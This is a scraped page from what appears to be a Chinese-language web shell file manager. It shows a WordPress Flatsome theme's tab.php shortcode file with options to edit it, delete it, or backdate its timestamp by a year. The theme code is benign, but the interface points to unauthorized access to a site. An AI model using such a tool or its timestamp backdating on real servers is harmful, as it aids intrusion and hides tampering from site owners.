文件操作 - tab.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/i2kplay/public_html/wp-content/themes/flatsome/inc/builder/shortcodes/tab.php
编辑文件内容
<?php add_ux_builder_shortcode( 'tab', array( 'type' => 'container', 'name' => __( 'Tab Panel' ), 'template' => flatsome_ux_builder_template( 'tab.html' ), 'info' => '{{ title }}', 'require' => array( 'tabgroup' ), 'hidden' => true, 'wrap' => false, 'options' => array( 'title' => array( 'type' => 'textfield', 'heading' => __( 'Title' ), 'default' => __( 'Tab Title' ), 'auto_focus' => true, ), 'anchor' => array( 'type' => 'textfield', 'heading' => __( 'Anchor' ), 'default' => '', 'description' => __( 'Automatically generated if left blank.' ), ), ), ) );
修改文件时间
将文件时间修改为当前时间的前一年
删除文件